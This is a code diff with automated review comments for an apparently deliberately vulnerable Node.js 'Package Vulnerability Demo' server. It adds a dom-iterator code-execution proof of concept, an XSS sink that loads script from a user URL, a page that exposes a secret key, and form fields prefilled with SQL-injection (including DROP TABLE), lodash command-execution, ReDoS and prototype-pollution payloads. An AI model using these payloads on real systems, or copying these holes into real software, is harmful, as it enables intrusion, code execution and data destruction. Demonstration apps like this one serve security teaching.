@@ -18,6 +18,33 @@ const server = http.createServer((req, res) => {
1818 const postData = qs . parse ( body ) ;
1919 let responseMessages = [ ] ;
2020
21+ // CVE-2024-21541: dom-iterator
22+ var PUT = require ( 'dom-iterator' ) ;
23+ global . CTF = function ( ) { console . log ( "GLOBAL.CTF HIT" ) } // We want to prove we can execute this by using the package
24+
25+ var parser = require ( 'mini-html-parser' ) ;
26+ var html = '<h1></h1>' ; // Any non-empty html should work
27+ var parser = parser ( html ) ;
28+ var node = parser . parse ( ) ;
29+ var it = PUT ( node ) ;
30+ var next ;
31+ while ( next = it . next ( "constructor.constructor('global.CTF()')()" ) ) { }
32+
33+ // Vulnerability: Missing SameSite Attribute on Cookies
34+ res . setHeader ( 'Set-Cookie' , `sessionToken=insecureToken; Path=/; HttpOnly; SameSite=None` ) ;
35+ res . setHeader ( 'Content-Type' , 'text/html' ) ;
36+
37+ // jQuery Vulnerability: CVE-2015-9251
38+ if ( postData . jqueryUrl ) {
39+ const jqueryCode = `<script src="${ postData . jqueryUrl } "></script>` ;
40+ responseMessages . push ( `<p>Loading jQuery from user-provided URL:</p><pre>${ jqueryCode } </pre>` ) ;
41+ res . write ( jqueryCode ) ; // This is vulnerable to XSS if untrusted URLs are provided
42+ }
43+
44+ // Placeholder for secret key (potential exposure risk)
45+ const SECRET_KEY = process . env . SECRET_KEY || 'PLACEHOLDER_SECRET_KEY' ;
46+ responseMessages . push ( `<p>Current Secret Key: ${ SECRET_KEY } </p>` ) ;
47+
2148 // Direct SQL Injection via string concatenation
2249 if ( postData . rawSql ) {
2350 try {
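Review bot: The comment at new line 33 says "Missing SameSite Attribute on Cookies", but the Set-Cookie header on the next line does set `SameSite=None`; what is actually missing is the `Secure` attribute, and current browsers reject `SameSite=None` cookies that lack it, so the demo cookie is likely never stored at all. Rename the comment to match the code, e.g. `// Vulnerability: SameSite=None cookie without the Secure attribute`, or switch the value to `SameSite=Lax` if the intent is to show a cookie the browser will keep. Separately, `var parser` is declared twice (new lines 25 and 27, first the module then the parsed instance), and the `require` calls plus the `global.CTF` assignment run inside the request handler on every POST; hoisting the requires to module scope and giving the instance a distinct name (`const parseHtml = require('mini-html-parser'); const doc = parseHtml(html);`) would make the demo block read cleanly. The enclosing request handler starts before this hunk.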
@@ -132,7 +159,6 @@ const server = http.createServer((req, res) => {
132159 }
133160
134161 // Send combined response
135- res . writeHead ( 200 , { 'Content-Type' : 'text/html' } ) ;
136162 res . end ( responseMessages . join ( '' ) + `<p><a href="/">Go back</a></p>` ) ;
137163 } ) ;
138164 } else if ( req . method === 'GET' ) {
@@ -195,10 +221,13 @@ const server = http.createServer((req, res) => {
195221 <body>
196222 <h2>Package Vulnerability Demo</h2>
197223 <form action="/" method="POST">
224+ <!-- 1. Direct SQL Injection -->
198225 <div>
199226 <h3>1. Direct SQL Injection</h3>
200227 <label for="rawSql">SQL Query:</label>
201- <input type="text" id="rawSql" name="rawSql" placeholder="Enter SQL query" style="width: 100%;">
228+ <input type="text" id="rawSql" name="rawSql"
229+ value="SELECT name FROM sqlite_master WHERE type='table';"
230+ style="width: 100%;">
202231 <small>Try these payloads:
203232 <ul>
204233 <li><code>SELECT name FROM sqlite_master WHERE type='table';</code> (List all tables)</li>
@@ -207,37 +236,57 @@ const server = http.createServer((req, res) => {
207236 </ul>
208237 </small>
209238 </div>
239+
240+ <!-- 2. Sequelize SQL Injection -->
210241 <div>
211242 <h3>2. Sequelize SQL Injection (CVE-2019-10748)</h3>
212243 <label for="username">Username (for Sequelize Injection):</label>
213- <input type="text" id="username" name="username" placeholder="Enter username">
244+ <input type="text" id="username" name="username"
245+ value='nonexistentuser" OR 1=1 --'>
214246 <small>Try payloads:
215247 <ul>
216248 <li><code>nonexistentuser" OR 1=1 --</code></li>
217249 <li><code>admin"; DROP TABLE Users; --</code></li>
218250 </ul>
219251 </small>
220252 </div>
253+
254+ <!-- 3. Lodash Template Processing -->
221255 <div>
222256 <h3>3. Lodash Template Processing (CVE-2021-23337)</h3>
223257 <label for="template">Template String:</label>
224- <textarea id="template" name="template" rows="4"></textarea>
258+ <textarea id="template" name="template" rows="4">
259+ <%= global.process.mainModule.require('child_process').execSync('ls -la') %>
260+ </textarea>
225261 <small>Try payload: <code><%= global.process.mainModule.require('child_process').execSync('ls -la') %></code></small>
226262 </div>
263+
264+ <!-- 4. Semver ReDoS Vulnerability -->
227265 <div>
228266 <h3>4. Semver ReDoS Vulnerability (CVE-2022-25883)</h3>
229267 <label for="versionRange">Version Range:</label>
230- <input type="text" id="versionRange" name="versionRange" placeholder="Enter version range">
268+ <input type="text" id="versionRange" name="versionRange"
269+ value="^((((((((((((((((((a)?){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2})*$">
231270 <small>Try payload: <code>^((((((((((((((((((a)?){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2})*$</code></small>
232271 </div>
272+
273+ <!-- 5. JSON5 Prototype Pollution -->
233274 <div>
234275 <h3>5. JSON5 Prototype Pollution (CVE-2022-46175)</h3>
235276 <label for="json5data">JSON5 Data:</label>
236- <textarea id="json5data" name="json5data" rows="4">
237- {
238- "__proto__": { "polluted": "Prototype pollution successful!" }
239- }
240- </textarea>
277+ <textarea id="json5data" name="json5data" rows="4">{
278+ "__proto__": { "polluted": "Prototype pollution successful!" }
279+ }</textarea>
280+ <small>Try payload: <code>{ "__proto__": { "polluted": "Prototype pollution successful!" } }</code></small>
281+ </div>
282+
283+ <!-- 6. jQuery XSS Vulnerability -->
284+ <div>
285+ <h3>6. jQuery XSS Vulnerability (CVE-2015-9251)</h3>
286+ <label for="jqueryUrl">jQuery URL:</label>
287+ <input type="text" id="jqueryUrl" name="jqueryUrl"
288+ value="http://sakurity.com/jqueryxss">
289+ <small>Try payload: <code>http://sakurity.com/jqueryxss</code></small>
241290 </div>
242291 <input type="submit" value="Submit">
243292 </form>
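Review bot: The template textarea at new lines 258–260 places its default value on an indented line between the tags, so the submitted `template` field will carry the leading indentation and a trailing newline; the json5data textarea at 277–279 was deliberately reworked to hug its tags, so the two are now inconsistent. Put the default directly after the opening tag, `<textarea id="template" name="template" rows="4"><%= … %></textarea>` (payload unchanged from the `<small>` hint on line 261), or accept the whitespace and note it in the HTML comment at line 254. The `<small>` hints under items 1–6 also repeat the prefilled values verbatim, which is harmless but worth a one-line comment saying the hints are kept for copy/paste.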